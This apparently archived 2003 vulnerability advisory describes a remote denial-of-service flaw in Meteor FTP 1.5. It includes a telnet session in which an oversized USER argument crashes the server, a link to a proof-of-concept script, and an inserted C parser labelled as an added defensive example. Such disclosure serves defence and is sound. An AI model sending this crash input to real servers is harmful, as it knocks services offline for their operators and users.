Remote denial of service vulnerability in Meteor FTP Version 1.5

2003-08-10T00:00:00
ID SECURITYVULNS:DOC:4973
Type securityvulns
Reporter Securityvulns
Modified 2003-08-10T00:00:00

Description

www.evicted.org
zerash@evicted.org
August 8, 2003

Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

1. Introduction

Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.

2. Vulnerability

A vulnerability exists in Meteor FTP Version 1.5, which allows any malicious user to remotely cause a denial of service against the ftp server.

Connecting to the Meteor FTP server and issuing USER followed by a large amount of data causes the ftp server to crash.

3. Example

Proof of concept exploit (meteordos.pl) is included in the attachment.

root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.
root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
USER anonymous
QUIT
telnet> quit
Connection closed.

At this point the server has completely frozen up. On the server side, Meteor FTP displays a dialog:

"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525), program terminated."

By clicking "OK", Meteor FTP terminates.
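As an added defensive illustration, not code from this advisory or from Meteor FTP: a bounded control-command parser that refuses a USER argument of the length shown above before copying it, returning a status code instead of writing past a buffer. The length limits (512-byte line, 128-byte argument) and the function names are assumptions chosen for the example.

```c
#include <string.h>
/* Added example, not Meteor FTP's code: a bounded parser for FTP control
 * commands. The length limits below are assumptions chosen for illustration. */
#define FTP_MAX_LINE 512   /* assumed: longest control line accepted */
#define FTP_MAX_VERB 8     /* FTP verbs are at most four letters plus NUL */
#define FTP_MAX_ARG  128   /* assumed: longest USER name or other argument */

enum ftp_parse_status { FTP_OK = 0, FTP_EMPTY, FTP_LINE_TOO_LONG,
                        FTP_VERB_TOO_LONG, FTP_ARG_TOO_LONG };
struct ftp_command { char verb[FTP_MAX_VERB]; char arg[FTP_MAX_ARG]; };

/* Parse one raw line (buf, len bytes, not necessarily NUL-terminated) from
 * the control connection. Every copy is bounded by its destination size, so
 * an oversized line yields a rejection code instead of an out-of-bounds write. */
enum ftp_parse_status ftp_parse_command(const char *buf, size_t len,
                                        struct ftp_command *out)
{
    size_t eol = 0, vlen = 0, alen;
    memset(out, 0, sizeof *out);
    /* Line ends at CR or LF; never scan past FTP_MAX_LINE bytes. */
    while (eol < len && eol < FTP_MAX_LINE && buf[eol] != '\r' && buf[eol] != '\n')
        eol++;
    if (eol == 0) return FTP_EMPTY;
    if (eol >= FTP_MAX_LINE) return FTP_LINE_TOO_LONG;
    /* Verb runs to the first space (or end of line, e.g. "QUIT"). */
    while (vlen < eol && buf[vlen] != ' ')
        vlen++;
    if (vlen >= FTP_MAX_VERB) return FTP_VERB_TOO_LONG;
    memcpy(out->verb, buf, vlen);
    if (vlen == eol) return FTP_OK;
    /* Argument follows a single space; reject it before copying if too long. */
    alen = eol - vlen - 1;
    if (alen >= FTP_MAX_ARG) return FTP_ARG_TOO_LONG;
    memcpy(out->arg, buf + vlen + 1, alen);
    return FTP_OK;
}

/* Build "USER " + n '%' bytes + CRLF, the shape of the session above (a
 * constructed input), and run it through the parser. */
enum ftp_parse_status ftp_check_padded_user(size_t n)
{
    char line[FTP_MAX_LINE * 2];
    struct ftp_command cmd; size_t i;
    memcpy(line, "USER ", 5);
    for (i = 5; i < 5 + n && i + 2 < sizeof line; i++)
        line[i] = '%';
    line[i++] = '\r'; line[i++] = '\n';
    return ftp_parse_command(line, i, &cmd);
}
```

A server built on this parser answers the long USER with a 5xx reply and keeps serving, which is the behaviour the advisory's session shows Meteor FTP 1.5 lacks.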

4. Vendor status

Vendor has been notified, waiting for response...

5. Credits

Vulnerability & code by zerash
You can view this advisory at : http://www.evicted.org/projects/writings/mftpadvisory.txt
You can view the exploit at : http://www.evicted.org/projects/code/meteordos.pl

6. Contact

Please send suggestions, updates, and comments to : zerash@evicted.org
http://www.evicted.org